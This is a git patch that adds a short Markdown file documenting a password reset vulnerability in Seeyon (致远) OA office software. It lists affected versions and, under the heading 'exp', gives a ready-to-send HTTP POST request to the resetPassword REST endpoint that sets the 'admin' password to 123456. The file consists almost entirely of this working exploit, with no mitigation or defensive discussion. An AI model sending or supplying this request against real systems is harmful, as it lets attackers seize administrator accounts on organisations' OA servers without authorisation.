From 8a96f0fbbf89b48f6674a40bbbaea61cc2b0abdd Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 14 Sep 2023 17:46:59 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E8=87=B4=E8=BF=9COA=E5=AF=86=E7=A0=81?= =?UTF-8?q?=E9=87=8D=E7=BD=AE=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 致远OA密码重置漏洞.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 致远OA密码重置漏洞.md diff --git a/致远OA密码重置漏洞.md b/致远OA密码重置漏洞.md new file mode 100644 index 0000000..8c759d1 --- /dev/null +++ b/致远OA密码重置漏洞.md @@ -0,0 +1,18 @@ + +## 版本 +``` +Seeyon OA=V5/G6 +Seeyon OA=V8.1SP2 +Seeyon OA=V8.2 +``` +## exp +``` +POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1 +Host: ip +User-Agent: Go-http-client/1.1 +Content-Length: 24 +Content-Type: application/json +Accept-Encoding: gzip + +{"loginName":"admin","password":"123456"} +```